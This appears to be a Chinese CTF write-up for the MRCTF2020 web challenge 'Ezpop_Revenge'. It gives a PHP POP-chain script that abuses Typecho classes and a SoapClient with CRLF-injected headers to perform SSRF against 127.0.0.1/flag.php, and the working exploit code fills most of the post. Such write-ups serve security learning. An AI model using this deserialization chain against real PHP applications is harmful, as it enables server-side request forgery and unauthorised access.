web | [MRCTF2020]Ezpop_Revenge

这是一个稍长的pop链构造

构造出ssrf打127.0.0.1

利用soap类

脚本如下:

 1 <?php
 2 
 3 
 4 //第一步 反序列化HelloWorld_DB
 5 class HelloWorld_DB{
 6     private $coincidence;
 7     function __construct(){
 8         $this->coincidence = ['hello' => new Typecho_Db_Query()];
 9     }
10 
11     function  __wakeup(){
12         $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']);
13     }
14 }
15 
16 
// Step 2: mirror of the target's Typecho_Db constructor (never instantiated locally).
// It is reproduced so the chain reads top to bottom: this is the class that turns the
// HelloWorld_DB gadget into a __toString() call on whatever $adapterName holds.
class Typecho_Db
{
    /**
     * @param mixed $adapterName on the target this is the Typecho_Db_Query object, so the
     *                           string concatenation below invokes its __toString()
     * @param mixed $prefix      table prefix; the chain passes null here (see step 1)
     */
    public function __construct($adapterName, $prefix = 'typecho_')
    {
        $this->_adapterName = $adapterName;
        $this->_prefix = $prefix;

        // 'Typecho_Db_Adapter_' . $object forces a string conversion — __toString() fires
        // before the adapter class is even looked up.
        $adapterClass = 'Typecho_Db_Adapter_' . $adapterName;
        $this->_adapter = new $adapterClass();
    }
}
32 
33 
34 # 3触发Typecho_Db_Query中 _toString
35 class Typecho_Db_Query
36 {
37     private $_sqlPreBuild;
38     private $_adapter;
39 
40     public function __construct()
41     {
42        $target = 'http://127.0.0.1/flag.php';
43         $headers = array(
44         'X-Forwarded-For: 127.0.0.1',
45         'Cookie: PHPSESSID=mz12345678'
46         );
47         $b = new SoapClient(
48             null,
49             array(
50                 'location' => $target,
51                 'user_agent'=>"xxxx\r\n".join("\r\n",$headers),
52                 'uri'      => "xxx")
53         );
54         $this->_sqlPreBuild =array("action"=>"SELECT");
55         $this->_adapter = $b;
56     }
57 }
58 
59 
60 
// Build the chain and dump it twice: raw for reading, and base64 so the NUL bytes that
// mark private property names survive copy/paste (this is why no %00 rewriting is needed).
$payload = serialize(new HelloWorld_DB());
var_dump($payload);
var_dump(base64_encode($payload));
65 
66 ?>

有的wp里提到了需要%00转\00然后s转S实际上用不到毕竟解码完啥也没过滤。

over.

posted @ 2020-12-31 11:40  Mz1